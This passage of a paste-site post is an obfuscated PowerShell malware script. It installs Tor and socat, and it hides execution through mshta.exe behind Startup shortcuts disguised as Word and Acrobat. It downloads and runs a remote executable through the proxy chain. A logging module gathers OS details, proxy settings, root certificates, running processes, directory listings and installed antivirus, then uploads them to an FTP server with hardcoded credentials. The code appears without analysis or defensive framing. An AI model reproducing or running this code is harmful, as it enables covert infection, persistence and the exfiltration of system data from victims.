  752. if ((Test-Path $gLRlOZOsud) -eq 1){Remove-Item -Force -Recurse $gLRlOZOsud;}mkdir $gLRlOZOsud | Out-Null;
  753. mWwT $tf $gLRlOZOsud;
  754. Remove-Item -Force $tf;
  755. $HXnQ=$gLRlOZOsud+"\T"+"or\";
  756. $OEnwgbJEWJe="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"t"+"or.exe`",0,False))";
  757. FqCZvVAFIWkCT (RandomString) 'mshta.exe' $OEnwgbJEWJe 0 0 $HXnQ;
  758.  
  759. Add-Shortcut "$([System.Environment]::SystemDirectory)\mshta.exe" "$([System.Environment]::GetFolderPath('Startup'))\msword.lnk" $vzfkFcawDbIUSya $toawwyJljC
  760.  
  761. $QDOKSGRmCckng=$env:Temp+'\'+(RandomString)+'.zip';
  762. $NNHcFwiW=(RandomString);
  763. $ytfOSwwAAgG=$gLRlOZOsud+'\'+$NNHcFwiW+'\';
  764. nne 'https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip' $QDOKSGRmCckng;
  765. if ( $(Try { Test-Path $QDOKSGRmCckng.trim() } Catch { $false })){
  766. mWwT $QDOKSGRmCckng $gLRlOZOsud;
  767. $BEqzKhTxCky=$gLRlOZOsud+'\socat-windows-1.7.2.1\';
  768. Rename-Item -path $BEqzKhTxCky -newName $NNHcFwiW;
  769. }else{
  770. nne 'http://blog.gentilkiwi.com/downloads/socat-1.7.2.1.zip' $QDOKSGRmCckng;
  771. mWwT $QDOKSGRmCckng $ytfOSwwAAgG;
  772. }
  773. Remove-Item -Force $QDOKSGRmCckng;
  774. $s1cmd='socat tcp4-LISTEN:53904,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:%DOMAIN%:80,socksport=9050';
  775. $s2cmd='socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:%DOMAIN%:5588,socksport=9050';
  776. $PwzNe="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s1cmd`",0,False))";
  777. $gLvFSMD="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s2cmd`",0,False))";
  778. FqCZvVAFIWkCT (RandomString) 'mshta.exe' $PwzNe 0 0 $ytfOSwwAAgG;
  779. FqCZvVAFIWkCT (RandomString) 'mshta.exe' $gLvFSMD 0 0 $ytfOSwwAAgG;
  780.  
  781. Add-Shortcut "$([System.Environment]::SystemDirectory)\mshta.exe" "$([System.Environment]::GetFolderPath('Startup'))\acrobat.lnk" $ytfOSwwAAgG $PwzNe
  782. Add-Shortcut "$([System.Environment]::SystemDirectory)\mshta.exe" "$([System.Environment]::GetFolderPath('Startup'))\sync.lnk" $ytfOSwwAAgG $gLvFSMD
  783.  
  784. $jSfqYGyepyLvWfi="vbsc"+"ript:close(CreateObject(`"WScript.Shell`").Run(`"powershell.exe `"`"`$F=`$env:Temp+'\\"+(RandomString)+".exe';rm -Force `$F;`$cl=(New-Object Net.WebClient);`$cl.DownloadFile('http://127.0.0.1:5555/"+(RandomString)+".asp?ts&ip='+`$cl.Download`"+`"String('http://api.ipify.org/'),`$F);& `$F`"`"`",0,False))";
  785. FqCZvVAFIWkCT (RandomString) 'mshta.exe' $jSfqYGyepyLvWfi 1;
  786. }
  787. ZjLBbVj;
  788.  
  789. $Logfile = $env:Temp+"\\$(gc env:computername).log";
  790.  
  791. Function LogWrite
  792. {
  793. Param ([string]$logstring)
  794. $dt=Get-Date -Format "dd.MM.yyyy HH:mm:ss";
  795. $msg=[string]::Format("[{0}]::[{1}]",$dt,$logstring);
  796. Write-Host $msg;
  797. Add-content $Logfile -value $msg;
  798. }
  799. Function UploadLog
  800. {
  801. $dest = "ftp://co-j-jp:escoj2013@wx04.wadax.ne.jp/public_html/logs";
  802. $wc = New-Object -TypeName System.Net.WebClient;
  803. $wc.UploadFile("$dest/$(gc env:computername).log", $Logfile);
  804. Remove-Item -Path $Logfile;
  805. }
  806. function CheckInstall(){
  807. $wininfo = (Get-WmiObject Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, Version, MUILanguages);
  808. $wininfo.MUILanguages=$wininfo.MUILanguages -join ",";
  809. LogWrite("OS info: {0}" -f $wininfo -join "");
  810. if (test-path variable:psversiontable) {
  811. $version = $psversiontable.psversion;
  812. } else {
  813. $version = [version]"1.0.0.0";
  814. }
  815. LogWrite("Powershell version: {0}" -f $version);
  816. try {
  817. $pac=Get-ItemProperty 'hkcu:\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\'|Select -expand AutoConfigURL -ErrorAction Stop;
  818. LogWrite("Pac setted: '$pac'");
  819. }
  820. catch {
  821. LogWrite("ERROR: Pac not setted");
  822. }
  823. $Certs = @(Get-ChildItem cert:\CurrentUser\ROOT|Where-Object {$_.Subject -like "*COMODO RSA Extended Validation Secure Server CA 2*" -or $_.Subject -like "*COMODO Certification Authority*"}|ForEach-Object {"{0} ({1})" -f ($_.Thumbprint,$_.NotBefore)});
  824. if (-NOT $Certs.count -eq 0){
  825. LogWrite("Certs installed: '{0}'" -f ($Certs -join "; "));
  826. }else {
  827. LogWrite("Certs not found");
  828. }
  829. try{
  830. $proc = Get-Process | Where-Object {$_.ProcessName -like "tor*" -or $_.ProcessName -like "socat*"}|Select -Property @{ Name="Out"; Expression={"ID:{0}`nName:{1}`nPath:{2}`n-------------" -f $_.Id,$_.ProcessName,$_.Path}}|Select -expand Out;
  831. LogWrite("Proccess list:`n{0}" -f ($proc -join "`n"));
  832. }
  833. catch {
  834. LogWrite("ERROR: Can't get proccess list");
  835. }
  836. $DestTP=$env:ALLUSERSPROFILE;
  837. try{
  838. $dirs=dir($DestTP) -ErrorAction Stop;
  839. LogWrite("List dir [{0}]: {1}" -f ($DestTP, (($dirs|Select -expand Name) -join "; ")));
  840. foreach($dir in $dirs){
  841. try{
  842. $subdir=dir($dir.FullName) -ErrorAction Stop;
  843. LogWrite("List dir [{0}]:{1}" -f ($dir.FullName, (($subdir|Select -expand Name) -join "; ")));
  844. }
  845. catch{
  846. LogWrite("ERROR: Can't list dir {0}" -f $dir.FullName);
  847. }
  848. }
  849. }
  850. catch {
  851. LogWrite("ERROR: Can't list dir {0}" -f $DestTP);
  852. }
  853.  
  854. $avlist=(Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct" @psboundparameters|Select -expand DisplayName);
  855. if (-NOT $avlist.count -eq 0){
  856. LogWrite("Av installed: '{0}'" -f ($avlist -join "; "));
  857. }else {
  858. LogWrite("Av not found");
  859. }
  860. }
  861. function StartWork(){
  862. LogWrite "Start Log module";
  863. Start-Sleep -s 3;
  864. CheckInstall;
  865. UploadLog;
  866. }
  867. StartWork;
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!